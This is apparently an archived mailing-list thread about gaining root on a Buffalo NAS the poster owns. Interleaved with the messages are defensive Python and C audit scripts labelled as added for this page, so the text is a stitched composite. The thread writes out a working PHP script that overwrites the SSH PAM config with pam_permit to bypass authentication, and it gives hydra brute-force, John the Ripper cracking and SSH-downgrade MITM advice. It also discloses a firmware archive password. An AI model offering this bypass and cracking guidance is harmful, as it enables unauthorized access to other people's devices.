Re: Is it possible to extract the root password from the file system?

2011-07-19 Thread Mark Phillips
On Mon, Jul 18, 2011 at 10:06 PM, Dan Dubovik dand...@gmail.com wrote:

 Can you SSH as the hammerhead user?

No
mark@orca:~/Desktop/buffalo_nas$ ssh hammerh...@xxx.xxx.xxx.xxx
Password:
Connection to xxx.xxx.xxx.xxx closed by remote host.
Connection to xxx.xxx.xxx.xxx closed.


 When you FTP as the hammerhead user, can you move the script.php file to
 the htdocs directory?  It has 777 permissions, so you should be able to open
 it / drop a file there.

Yes, I can, and it does execute.


 If you can get a PHP file uploaded and able to execute properly, perhaps a
 PHP based shell could help?

I am not a php guy. I don't know how to do this.

I tried a script to allow ssh without a password for anyone. It seems to have
written the file; however, I still cannot ssh in as root. Note: this is my
first php script; the print statements helped me debug and see if it was
working.

<?php
echo "starting...<br>";
$filename = '/etc/pam.d/sshd';
// 'w+' truncates the file to zero length the moment it is opened, so this
// first fread() always returns an empty string, not the previous contents.
$fh = fopen($filename, 'w+') or die("can't open file");
$contents = fread($fh, 1000);
echo "..file contents:<br> $contents<br>";

$stringData = "account  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#1 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

$stringData = "session  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#2 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

$stringData = "auth required pam_permit.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#3 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

rewind($fh);
$contents = fread($fh, 1000);
echo "...final file contents:<br> $contents<br>";

fclose($fh);
echo "done!<br>";
?>

Output from the script:
starting...
..file contents:

...wrote 32 bytes: 'account required pam_unix.so '
...wrote 32 bytes: 'session required pam_unix.so '
...wrote 28 bytes: 'auth required pam_permit.so '
...final file contents:
account required pam_unix.so session required pam_unix.so auth required
pam_permit.so
done!

One strange behavior: when I re-run the script, I expected to see the
contents of the file displayed after 'starting...' above, but it always
comes back blank, and I still cannot log in using ssh.

I did this:
1. restart the nas
2. run script
3. I get this output:
mark@orca:~/Desktop/buffalo_nas$ ssh r...@xxx.xxx.xxx.xxx
Connection closed by xxx.xxx.xxx.xxx

4. reset nas again
5. I get this output:
mark@orca:~/Desktop/buffalo_nas$ ssh r...@xxx.xxx.xxx.xxx
Password:
Password:
Password:

Then all I get when I try to ssh in is Connection closed.

Does anyone have any php scripts to hack this box and give me root access
via ssh?

Thanks!

Mark


 -- Dan.


Re: Is it possible to extract the root password from the file system?

2011-07-18 Thread Bryan O'Neal
I was not saying you knew the root password, just that you knew a
password and a corresponding hash to said password and the root hash;
JTR should be able to get you the correct root password.

On 7/17/11, Mark Phillips m...@phillipsmarketing.biz wrote:
 Bryan,

 I think what you are missing is the "...and you know your password". I
 don't know the root password for the NAS box. That is what I am trying to
 figure out so I can ssh into the box as root. What I have:

 * Buffalo NAS LS-WXL with firmware rev 1.43

 * I can ssh as root and get a password prompt.

 * I can ftp into the box as a user that I created, but cannot get to the
 filesystem that way.

 * I have downloaded the firmware and unzipped it. One thought is to add a
 key to ssh for root and login. Reflashing the unit with firmware that does
 not come from the Buffalo site is not well documented, so I have put this
 possible solution on hold for the time being.

 * I just found the info about using some type of php exploit, hence my
 previous email. I am not a php guy, so I am a little lost on how to make it
 work.

 Does this elicit any thoughts on how to crack the root password for this
 box?

 Thanks!

 Mark


Re: Is it possible to extract the root password from the file system?

2011-07-18 Thread Lisa Kachold
I believe the script.php has to be moved to the webroot directory and given
permissions there I believe, but well if you can't get a login via ssh... --
how to do it?

On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips m...@phillipsmarketing.biz wrote:

 On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.com wrote:

 There are a lot of password files and dictionary lists on various sites.
 Backtrack5 contains a good number.

 But I imagine that it's either not allowing root via ssh or you have the
 wrong username.


 It turns out the box is smarter than a fifth grader. After a few hydra
 attacks, it started rejecting all the hydra attempts to ssh in via root.
 Once I stopped hydra (after running all night), it took a couple of hours
 before it would respond to ssh attempts from root. It now will ask for the
 root password, but I still have no idea what it is.


 Or it's a truly random string.

 It could be. The password for the zip file to unzip the file system is
 YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4. Someone retrieved it using a
 disassembler on the file system.

 I did some more reading, and one person was able to use php to allow ssh
 login. The box allows one to create a web space, and it comes with php
 installed. One can edit the php.ini file, and I can upload via ftp a php
 script. The script they suggested is:
 <?php
 $file = '../../../../etc/pam.d/sshd';
 $fh = fopen($file, 'w') or die("can't open file");
 $stringData = "account  required   pam_unix.so\n";
 fwrite($fh, $stringData);
 $stringData = "session  required   pam_unix.so\n";
 fwrite($fh, $stringData);
 $stringData = "auth required pam_permit.so\n";
 fwrite($fh, $stringData);
 fclose($fh);
 ?>

 I uploaded the script, but I get a 404 File not Found when I access the
 page. I thought it might be a file permission error since the file is only
 rw. I tried chmod 777 at the ftp prompt, and got the error message File not
 Found, but ls shows it is there.

 ftp> ls
 200 PORT command successful
 150 Opening ASCII mode data connection for file list
 drwxrwxrwx   2 apache   apache  6 Jul 17 08:23 cgi-bin
 drwxrwxrwx   2 apache   apache 22 Jul 17 08:23 htdocs
 drwxrwxrwx   2 apache   apache 39 Jul 17 08:23 log
 -rw-rw-rw-   1 hammerhead hdusers   335 Jul 17 08:49 script.php
 226 Transfer complete
 ftp> chmod 777 script.php
 550 CHMOD 777 script.php: No such file or directory
 ftp>

 Is there anything I can change in the php.ini file to make this script
 execute? Or, am I missing something else?

 BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.

 Thanks,

 Mark


-- 
(602) 791-8002  Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
HomeSmartInternational.com http://www.homesmartinternational.com
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
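The lockout Mark describes in the quoted message above (the NAS refusing root logins after a burst of hydra attempts, then accepting connections again a couple of hours later) is what a failure counter with a timed lockout produces. The following is an added example written for this page, not code from the thread or from the NAS firmware: a sliding-window detector run over sshd-style auth log lines that locks a source out after a burst of failures and lets it back in once the lockout expires. The log lines, the "nas" hostname, the 192.0.2.x addresses and the thresholds are all constructed for the example.

```python
"""Sliding-window SSH failed-login detector with a temporary source lockout.

Added example for this page (not from the thread or the NAS firmware).
The sample log lines, hostname "nas", 192.0.2.x source addresses and the
thresholds are constructed for the demonstration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH "Failed password" line as it appears in a syslog auth log.
FAILED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+)"
)


class LockoutPolicy:
    """Lock a source out for lockout_s seconds once it reaches `threshold`
    failed logins inside a window_s-second sliding window."""

    def __init__(self, threshold=5, window_s=60, lockout_s=7200, year=2011):
        self.threshold = threshold
        self.window_s = window_s
        self.lockout_s = lockout_s
        self.year = year                      # syslog timestamps carry no year
        self.failures = defaultdict(deque)    # src -> recent failure times
        self.locked_until = {}                # src -> time the lockout expires
        self.events = []                      # (src, "LOCK" | "UNLOCK", time)

    def _parse_ts(self, text):
        return datetime.strptime(f"{self.year} {text}", "%Y %b %d %H:%M:%S").timestamp()

    def is_locked(self, src, now):
        """True while src is inside its lockout; clears the lockout once it has passed."""
        until = self.locked_until.get(src)
        if until is None:
            return False
        if now >= until:
            del self.locked_until[src]
            self.events.append((src, "UNLOCK", now))
            return False
        return True

    def feed(self, line):
        """Consume one log line; return True if it triggered a new lockout."""
        m = FAILED.search(line)
        if not m:
            return False                      # not a failed-login line
        now, src = self._parse_ts(m.group("ts")), m.group("src")
        if self.is_locked(src, now):
            return False                      # attempt during lockout: already blocked
        recent = self.failures[src]
        recent.append(now)
        while recent and now - recent[0] > self.window_s:
            recent.popleft()                  # drop failures outside the window
        if len(recent) >= self.threshold:
            self.locked_until[src] = now + self.lockout_s
            self.events.append((src, "LOCK", now))
            recent.clear()
            return True
        return False


def run(lines, **policy_args):
    """Feed every line through a fresh policy; return (policy, indexes that locked)."""
    policy = LockoutPolicy(**policy_args)
    locked_at = [i for i, line in enumerate(lines) if policy.feed(line)]
    return policy, locked_at


# Constructed sample: a burst of six failures from one source, one stray
# failure from another source, and a retry from the first source after the
# two-hour lockout has expired.
SAMPLE_LOG = [
    "Jul 18 22:01:05 nas sshd[2312]: Failed password for root from 192.0.2.10 port 51122 ssh2",
    "Jul 18 22:01:06 nas sshd[2313]: Failed password for root from 192.0.2.10 port 51123 ssh2",
    "Jul 18 22:01:07 nas sshd[2314]: Failed password for root from 192.0.2.10 port 51124 ssh2",
    "Jul 18 22:01:08 nas sshd[2315]: Failed password for invalid user admin from 192.0.2.10 port 51125 ssh2",
    "Jul 18 22:01:09 nas sshd[2316]: Failed password for root from 192.0.2.10 port 51126 ssh2",
    "Jul 18 22:01:10 nas sshd[2317]: Failed password for root from 192.0.2.10 port 51127 ssh2",
    "Jul 18 22:05:00 nas sshd[2318]: Failed password for root from 192.0.2.77 port 40001 ssh2",
    "Jul 19 00:30:00 nas sshd[2400]: Failed password for root from 192.0.2.10 port 51200 ssh2",
]

if __name__ == "__main__":
    policy, locked_at = run(SAMPLE_LOG)
    for src, kind, when in policy.events:
        print(f"{kind:6} {src} at {datetime.fromtimestamp(when):%b %d %H:%M:%S}")
    print("lines that triggered a lockout:", locked_at)
```

On the sample the fifth failure from 192.0.2.10 triggers the lockout, the sixth is ignored while locked, the single failure from 192.0.2.77 stays below threshold, and the retry two and a half hours later finds the lockout expired. The failure window is cleared on lock so that the same burst cannot re-trigger on the first attempt after release.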

Re: Is it possible to extract the root password from the file system?

2011-07-18 Thread Dan Dubovik
Can you SSH as the hammerhead user?

When you FTP as the hammerhead user, can you move the script.php file to the
htdocs directory?  It has 777 permissions, so you should be able to open it /
drop a file there.

If you can get a PHP file uploaded and able to execute properly, perhaps a
PHP based shell could help?

-- Dan.

On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold lisakach...@obnosis.com wrote:

 I believe the script.php has to be moved to the webroot directory and given
 permissions there I believe, but well if you can't get a login via ssh... --
 how to do it?



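Dan's point above, that htdocs is mode 777 and so any FTP account can drop a file there which the web server will then run, is exactly the condition a hardening check on a box like this should catch. The following is an added example for this page, not the thread's or Buffalo's code: it walks a document root, reports directories anyone can write to and server-side scripts that other users can rewrite, and builds a throwaway tree mirroring the listing from the thread (directory names from the listing; modes, file contents and the temporary location constructed) so it runs anywhere.

```python
"""Audit a web document root for world-writable directories and writable scripts.

Added example for this page (not from the thread or Buffalo's firmware).
The directory names mirror the FTP listing in the thread; the modes, the
file contents and the temporary location are constructed for the example.
"""
import os
import shutil
import stat
import tempfile

SCRIPT_SUFFIXES = (".php", ".cgi", ".pl", ".py", ".sh")


def audit_webroot(root):
    """Return sorted (path relative to root, problem) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            # Anyone who can reach the filesystem (an FTP account, say) can
            # create files in a world-writable directory.
            if mode & stat.S_IWOTH:
                findings.append((os.path.relpath(path, root), "world-writable directory"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            # A server-side script that other users can rewrite is code
            # execution for those users.
            if name.endswith(SCRIPT_SUFFIXES) and mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((os.path.relpath(path, root), "group/world-writable script"))
    return sorted(findings)


def build_sample_tree():
    """Create a throwaway tree with the layout from the thread's listing."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for name, mode in (("cgi-bin", 0o777), ("htdocs", 0o777), ("log", 0o755)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)
    files = {
        ("htdocs", "script.php"): (0o666, "<?php echo 'constructed sample'; ?>\n"),
        ("htdocs", "index.html"): (0o644, "<html></html>\n"),
    }
    for (sub, name), (mode, body) in files.items():
        path = os.path.join(root, sub, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root


def run_sample():
    """Build the sample tree, audit it, clean up, and return the findings."""
    root = build_sample_tree()
    try:
        return audit_webroot(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, problem in run_sample():
        print(f"{problem:28} {path}")
```

Run as a script it prints the three findings for the sample tree (both 777 directories and the 666 script.php); point audit_webroot() at a real document root to check a live box. The directory check deliberately does not exempt sticky-bit directories: for a web root the problem is file creation, not deletion.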

Re: Is it possible to extract the root password from the file system?

2011-07-17 Thread Sam Kreimeyer
Mark,

Openwall is one of the better free lists out there. BT5 has darkc0de in it
(17MB). I can't think of any others that you don't have to pay for. However,
you can pass rules to JTR for creating word permutations on the fly to
expand your list (use the --rules option [note: default rules will increase
the dictionary size about 40x]) or add entries yourself to the text file. If
you have a good guess as to words the password probably contains, you could
use that with the word rules to make a custom dictionary to run against it.
Given how long your first dictionary attack ran, though, I would say that
getting a larger dictionary (and you can get some that are several gigs)
might be prohibitively time consuming. If you really want to go that route,
then I'd try it with something like hashcat or another hash generator that can
utilize a GPU. Even economy ATI and Nvidia cards can greatly speed up the
process.

Just a thought: do you know if JTR is running the right hashing algorithm?
The first number in the /etc/shadow file should tell you. Not too long ago I
wasted a few hours waiting for JTR to crack the wrong hashed password before
I realized what happened. The --format option will take care of that.

This may be a silly question, but is it possible to boot the NAS in rescue
mode? If that's not an option, the only other alternative I can think of
would be looking for services vulnerable to privilege escalation.
http://www.exploit-db.com/ might have some useful code for that. Just do a
search for some of the services on the system.

I hope it works out!

Re: Is it possible to extract the root password from the file system?

2011-07-17 Thread Bryan O'Neal
If you can get a copy of the password hash file, and you know your
password, then you should be able to figure out the hash function and
JTR should give you every password on the box. So... I seem to be
missing something in this conversation thread?

On 7/17/11, Mark Phillips m...@phillipsmarketing.biz wrote:
 On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold lisakach...@obnosis.com wrote:

 There are a lot of password files and dictionary lists on various sites.
 Backtrack5 contains a good number.

 But I imagine that it's either not allowing root via ssh or you have the
 wrong username.


 It turns out the box is smarter than a fifth grader. After a few hydra
 attacks, it started rejecting all the hydra attempts to ssh in via root.
 Once I stopped hydra (after running all night), it took a couple of hours
 before it would respond to ssh attempts from root. It now will ask for the
 root password, but I still have no idea what it is.


 Or it's a truly random string.

 It could be. The password for the zip file to unzip the file system is
 YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4. Someone retrieved it using a
 disassembler on the file system.

 I did some more reading, and one person was able to use php to allow ssh
 login. The box allows one to create a web space, and it comes with php
 installed. One can edit the php.ini file, and I can upload via ftp a php
 script. The script they suggested is:
 <?php
 $file = '../../../../etc/pam.d/sshd';
 $fh = fopen($file, 'w') or die("can't open file");
 $stringData = "account  required   pam_unix.so\n";
 fwrite($fh, $stringData);
 $stringData = "session  required   pam_unix.so\n";
 fwrite($fh, $stringData);
 $stringData = "auth required pam_permit.so\n";
 fwrite($fh, $stringData);
 fclose($fh);
 ?>

 I uploaded the script, but I get a 404 File not Found when I access the
 page. I thought it might be a file permission error since the file is only
 rw. I tried chmod 777 at the ftp prompt, and got the error message File not
 Found, but ls shows it is there.

 ftp> ls
 200 PORT command successful
 150 Opening ASCII mode data connection for file list
 drwxrwxrwx   2 apache   apache  6 Jul 17 08:23 cgi-bin
 drwxrwxrwx   2 apache   apache 22 Jul 17 08:23 htdocs
 drwxrwxrwx   2 apache   apache 39 Jul 17 08:23 log
 -rw-rw-rw-   1 hammerhead hdusers   335 Jul 17 08:49 script.php
 226 Transfer complete
 ftp> chmod 777 script.php
 550 CHMOD 777 script.php: No such file or directory
 ftp>

 Is there anything I can change in the php.ini file to make this script
 execute? Or, am I missing something else?

 BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.

 Thanks,

 Mark


-- 
Sent from my mobile device


Re: Is it possible to extract the root password from the file system?

2011-07-17 Thread Mark Phillips
Bryan,

I think what you are missing is the "...and you know your password". I
don't know the root password for the NAS box. That is what I am trying to
figure out so I can ssh into the box as root. What I have:

* Buffalo NAS LS-WXL with firmware rev 1.43

* I can ssh as root and get a password prompt.

* I can ftp into the box as a user that I created, but cannot get to the
filesystem that way.

* I have downloaded the firmware and unzipped it. One thought is to add a
key to ssh for root and login. Reflashing the unit with firmware that does
not come from the Buffalo site is not well documented, so I have put this
possible solution on hold for the time being.

* I just found the info about using some type of php exploit, hence my
previous email. I am not a php guy, so I am a little lost on how to make it
work.

Does this elicit any thoughts on how to crack the root password for this
box?

Thanks!

Mark

On Sun, Jul 17, 2011 at 4:31 PM, Bryan O'Neal bryan.on...@theonealandassociates.com wrote:

 If you can get a copy of the password hash file, and you know your
 password, then you should be able to figure out the hash function and
 JTR should give you every password on the box. So... I seem to be
 missing something in this conversation thread?


Re: Is it possible to extract the root password from the file system?

2011-07-16 Thread Lisa Kachold
There are a lot of password files and dictionary lists on various sites.
Backtrack5 contains a good number.

But I imagine that it's either not allowing root via ssh or you have the
wrong username.

Or it's a truly random string.

On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips m...@phillipsmarketing.biz wrote:

 Since this is a drive buffalo, I might try ettercap ssh downgrade attack:

 http://openmaniak.com/ettercap_filter.php
 http://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade

 Not sure how a man in the middle attack will work, since I don't know the
 password to begin with...

 Or Hydra:

 Hydra Instructions:

 http://www.youtube.com/watch?v=7CP-JB4QARo


 Hydra is promising. I tried it with the common passwords list from
 openwall. No luck. Do you have any better password lists?

 Thanks,

 Mark


Re: Is it possible to extract the root password from the file system?

2011-07-15 Thread Lisa Kachold
Mark,

On Thu, Jul 14, 2011 at 6:56 PM, Mark Phillips m...@phillipsmarketing.biz wrote:

 Lisa,

 John the Ripper has been running for almost 2 days trying to crack the
 password... still no success.


I think it's hung.  What options did you pass it?

Did you feed it a dictionary file?

It probably has a different encryption format than the linux john is on.

What ports are open on the thing?  SSH?  You can try ettercap with arp spoof
MITM?


Re: Is it possible to extract the root password from the file system?

2011-07-15 Thread Mark Phillips
On Fri, Jul 15, 2011 at 7:27 PM, Lisa Kachold lisakach...@obnosis.com wrote:

 Mark,

 On Thu, Jul 14, 2011 at 6:56 PM, Mark Phillips m...@phillipsmarketing.biz
  wrote:

 Lisa,

 John the Ripper has been running for almost 2 days trying to crack the
 password... still no success.


 I think it's hung.

Nope. The log file keeps spitting out what it is testing. I stopped it today
and moved the process to another machine. You can see the results as
reported in the log file at http://pastebin.com/pBZHfAS2 when I stopped the
program. The other machine is slower (about 1.85 times slower, so it will
take until Monday for it to catch up... the original machine was an x64, and
the new machine is an i386, so I couldn't resume on the new machine). I will
let you know if it finds the password after a week or two ;-)


 What options did you pass it?

None. Except that I used another program that came with john to join the
passwd and shadow files into one file. John needed that. I can send you the
passwd file if you are interested.


 Did you feed it a dictionary file?

Just the one that came with john...


 It probably has a different encryption format than the linux john is on.

 What ports are open on the thing?  SSH?  You can try ettercap with arp
 spoof MITM?

SSH seems to be open since it asks for a password. rsync and telnet are all
that I know. There is a Java hack program acp_commander.jar that will
connect with telnet, but I do not get any response from the device, although
it says it is connected. acp-commander.jar used to be the way in, but since
firmware version 1.41, it has not worked.
http://downloads.buffalo.nas-central.org/TOOLS/ALL_LS_KB_ARM9/ACP_COMMANDER/,
http://buffalo.nas-central.org/index.php/Open_Stock_Firmware and my
particular box.

I have downloaded the firmware for the box and modified it to accept ssh
login without a password (using ssh keys). I just have not been able to
reflash the unit. The web interface only flashes what it downloads from
buffalo.com. The Windows program the box came with does not have a way to
flash the unit. Embedded in the firmware download is a Windows exe which is
supposed to be a program to flash the unit... just haven't had the
intestinal fortitude to try it out... I need to find the way back in case I
brick the device, and I haven't had time to research that.

Thanks for your interest!

P.S. You have no idea how hard it is to not type "Dear John" every time I
refer to the program John the Ripper ;-)  Anyway, back to TGIF
time ;-)

Mark


Re: Is it possible to extract the root password from the file system?

2011-07-15 Thread Lisa Kachold
On Fri, Jul 15, 2011 at 8:03 PM, Mark Phillips
m...@phillipsmarketing.biz wrote:

Since this is a Buffalo drive, I might try the ettercap ssh downgrade attack:

http://openmaniak.com/ettercap_filter.php
http://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade

Or Hydra:

Hydra Instructions:

http://www.youtube.com/watch?v=7CP-JB4QARo


Re: Is it possible to extract the root password from the file system?

2011-07-15 Thread Mark Phillips

 Since this is a Buffalo drive, I might try the ettercap ssh downgrade attack:

 http://openmaniak.com/ettercap_filter.php
 http://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade

Not sure how a man in the middle attack will work, since I don't know the
password to begin with...

 Or Hydra:

 Hydra Instructions:

 http://www.youtube.com/watch?v=7CP-JB4QARo


Hydra is promising. I tried it with the common passwords list from
openwall. No luck. Do you have any better password lists?

Thanks,

Mark

Re: Is it possible to extract the root password from the file system?

2011-07-14 Thread Sam Kreimeyer
Hello Mark,

Have you tried using Kon-Boot? It's a bootable image that edits the kernel
to bypass the password prompt.

Re: Is it possible to extract the root password from the file system?

2011-07-14 Thread Lisa Kachold
If you don't have the ability to boot something like a DVD/CD or USB key,
try john the ripper?

Save the encrypted string to a test file and run it through john the ripper
running on your system:

Ubuntu:

# apt-get install john

Centos/RH/Fedora:

# yum install john

Example use:

# john -single crackme.txt

References:

http://www.openwall.com/john/doc/

http://www.google.com/url?sa=tsource=videocd=1ved=0CDIQtwIwAAurl=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D3YyscD_tADkrct=jq=john%20the%20rippertbm=videi=t3ofTsXRNqTv0gHB2bmYAwusg=AFQjCNE8vdlkxhwQ15zCuBePI9Y9qk3mAQcad=rja

http://www.osix.net/modules/article/?id=455


On Thu, Jul 14, 2011 at 11:19 AM, Sam Kreimeyer skrei...@gmail.com wrote:


Re: Is it possible to extract the root password from the file system?

2011-07-14 Thread Mark Phillips
Lisa,

John the Ripper has been running for almost 2 days trying to crack the
password... still no success.

:)

Mark
On Jul 14, 2011 4:28 PM, Lisa Kachold lisakach...@obnosis.com wrote:

Re: Is it possible to extract the root password from the file system?

2011-07-12 Thread Matt Graham
From: Mark Phillips m...@phillipsmarketing.biz
 I was able to unzip the firmware to my laptop and it appears that
 ssh root login is now enabled in the stock firmware. I confirmed
 this by trying ssh to the machine... but, I need the root password
 to login. How can I extract the root password from the file system
 for the device?

 I assume Linux/Linus has made it impossible to get at the root
 password this way (e.g. from a copy of the file system)

Not impossible.  Just annoyingly difficult.  And there's got to be a better
way than that.  But to get the password via brute-force, read on:

/etc/shadow should contain a line like:

root:$1$02PZeP4V$oh.for.hecks.sake:0:9:7:::

...Take a look at the second field.  The part between the first and last $ is
the salt, and the rest is the crypted password.  If the second field is empty,
then root's password is the empty string.  If the second field contains *, !,
or x, then the crypt() function can't generate that string, and root can't
log in with a password.  But then you could do something like

/* testcrypt.c
 * gcc -o testcrypt testcrypt.c -lcrypt */
#define _XOPEN_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <crypt.h>   /* crypt() is declared here on current glibc/libxcrypt */

int main(int argc, char **argv)
{
    char *salt = "$1$02PZeP4V$"; /* salt part of above string */
    if (argc < 2) {
        fprintf(stderr, "usage: %s candidate-password\n", argv[0]);
        return 1;
    }
    char *hash = crypt(argv[1], salt); /* NULL if the salt/algorithm is unsupported */
    if (hash == NULL) {
        perror("crypt");
        return 1;
    }
    printf("%s crypted with %s is: %s\n", argv[1], salt, hash);
    return 0;
}
/* end C */

strncmp() the result of crypt() with the oh.for.hecks.sake portion of the
string from /etc/shadow , and if you get 0, you've got a password match. 
You'd probably have to go through a very long list of strings before finding
the right one.  There's no telling what they picked.  I'd guess the password
would be somewhere in the manual or the docs, but ICBW.

You might be able to take the firmware's shadow file, replace the crypted
string for root with your own crypted string from your own Linux box's shadow
file, then pack up that firmware and install it on the device.  Then you'd
know root's password.

-- 
Matt G / Dances With Crows
The Crow202 Blog:  http://crow202.org/wordpress/
There is no Darkness in Eternity/But only Light too dim for us to see

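
The shadow-line classification Matt lays out above (empty second field, a
'*' / '!' / 'x' field that crypt() can never produce, "$1$salt$hash"
otherwise), turned into a small offline audit helper for an unpacked
firmware image. This is an added example for this thread, not code from Matt
or from the Buffalo firmware; the sample lines are constructed, modelled on
his root line, and the "$6$" and '!'-prefixed entries are assumptions added
to show the SHA-512 and locked cases. It recovers the salt that crypt()
needs, names the algorithm so weak MD5/DES hashes stand out in an audit, and
compares a computed crypt() string against the stored field without the
position-dependent early exit of strncmp():

```c
/* shadow_audit.c: classify the password field of an /etc/shadow line as
 * Matt describes, so a firmware image's shadow file can be audited offline.
 * Added example for this thread, not code from any poster.
 * Build: gcc -Wall -o shadow_audit shadow_audit.c   (no -lcrypt needed) */
#include <stdio.h>
#include <string.h>

enum pw_state {
    PW_EMPTY,     /* second field empty: root logs in with an empty password */
    PW_LOCKED,    /* '*', '!'-prefixed or 'x': crypt() can never produce it */
    PW_HASHED,    /* a crypt(3) string; its salt can be recovered for checking */
    PW_MALFORMED  /* not a shape crypt(3) would emit */
};

/* Copy the second colon-separated field of line into field (size n).
 * Returns its length, or -1 if there is no second field or it does not fit. */
static int shadow_pw_field(const char *line, char *field, size_t n)
{
    const char *start = strchr(line, ':');
    if (!start) return -1;
    start++;
    const char *end = strchr(start, ':');
    size_t len = end ? (size_t)(end - start) : strlen(start);
    if (len >= n) return -1;
    memcpy(field, start, len);
    field[len] = '\0';
    return (int)len;
}

enum pw_state classify_shadow_line(const char *line)
{
    char f[256];
    int len = shadow_pw_field(line, f, sizeof f);
    if (len < 0) return PW_MALFORMED;
    if (len == 0) return PW_EMPTY;
    if (f[0] == '*' || f[0] == '!' || strcmp(f, "x") == 0) return PW_LOCKED;
    if (f[0] == '$') {                 /* modular crypt format: $id$salt$hash */
        const char *last = strrchr(f, '$');
        return (last != f && last[1] != '\0') ? PW_HASHED : PW_MALFORMED;
    }
    return len == 13 ? PW_HASHED : PW_MALFORMED;   /* traditional DES crypt */
}

/* Recover the salt crypt(candidate, salt) needs: "$1$02PZeP4V$" for a
 * modular entry, the first two characters for DES. 0 on success, else -1. */
int shadow_salt(const char *line, char *salt, size_t n)
{
    char f[256];
    if (classify_shadow_line(line) != PW_HASHED) return -1;
    shadow_pw_field(line, f, sizeof f);
    size_t slen = (f[0] == '$') ? (size_t)(strrchr(f, '$') - f) + 1 : 2;
    if (slen >= n) return -1;
    memcpy(salt, f, slen);
    salt[slen] = '\0';
    return 0;
}

/* Name the algorithm from the $id$ prefix so weak hashes stand out. */
const char *shadow_algorithm(const char *line)
{
    char f[256];
    if (classify_shadow_line(line) != PW_HASHED) return "none";
    shadow_pw_field(line, f, sizeof f);
    if (f[0] != '$') return "DES (weak)";
    if (strncmp(f, "$1$", 3) == 0) return "MD5 (weak)";
    if (strncmp(f, "$5$", 3) == 0) return "SHA-256";
    if (strncmp(f, "$6$", 3) == 0) return "SHA-512";
    if (strncmp(f, "$2", 2) == 0) return "bcrypt";
    return "unknown";
}

/* Compare a crypt() result with the stored field in constant time over the
 * shorter length, so a mismatch does not leak where it occurred. 1 = match. */
int hash_matches(const char *computed, const char *line)
{
    char f[256];
    if (shadow_pw_field(line, f, sizeof f) < 0) return 0;
    size_t a = strlen(computed), b = strlen(f);
    unsigned char diff = (unsigned char)(a != b);
    for (size_t i = 0; i < a && i < b; i++)
        diff |= (unsigned char)(computed[i] ^ f[i]);
    return diff == 0;
}

int main(void)
{
    /* constructed sample lines, modelled on Matt's root line */
    static const char *lines[] = {
        "root:$1$02PZeP4V$oh.for.hecks.sake:0:9:7:::",
        "root::0:9:7:::",
        "root:*:0:9:7:::",
        "admin:!$6$abcdefgh$ijklmnop:15000:0:99999:7:::",
    };
    static const char *names[] = { "EMPTY", "LOCKED", "HASHED", "MALFORMED" };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        char salt[64] = "-";
        shadow_salt(lines[i], salt, sizeof salt);
        printf("%-48s %-9s %-10s salt=%s\n", lines[i],
               names[classify_shadow_line(lines[i])], shadow_algorithm(lines[i]), salt);
    }
    return 0;
}
```

To check one candidate the way testcrypt.c does, link with -lcrypt, pass the
salt from shadow_salt() to crypt(candidate, salt), and hand the result to
hash_matches(); comparing the whole string rather than strncmp() on the tail
also catches an entry whose salt was swapped. The classification alone answers
the question that should come before days of John: whether the image's root
account can be logged into with a password at all.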


Re: Is it possible to extract the root password from the file system?

2011-07-12 Thread Steven A. DuChene
There are password hacking tools out there you could run against the encrypted
password that is stored in /etc/shadow, but if there is a locked root account
there may not be an encrypted password for root in that file and you will
never be able to log in.
--
Steven DuChene

-Original Message-
From: Mark Phillips
Sent: Jul 12, 2011 11:16 AM
To: Phoenix Linux Users
Subject: Is it possible to extract the root password from the file system?

I have a new Buffalo LS-WXL NAS and I would like to root it. It has the
newer firmware version, 1.43, and the instructions for rooting it (
http://buffalo.nas-central.org/wiki/Category:LS-WXL) have not caught up with
the new firmware. However, I was able to unzip the firmware to my laptop and
it appears that ssh root login is now enabled in the stock firmware. I
confirmed this by trying ssh to the machine... but, I need the root
password to login. How can I extract the root password from the file system
for the device? I just have the file system unzipped on my hard drive, I
don't have access to it running.

I assume Linux/Linus has made it impossible to get at the root password this
way (e.g. from a copy of the file system), but I thought I would ask anyway
before I try to install some custom firmware on the NAS device.

Thanks,

Mark

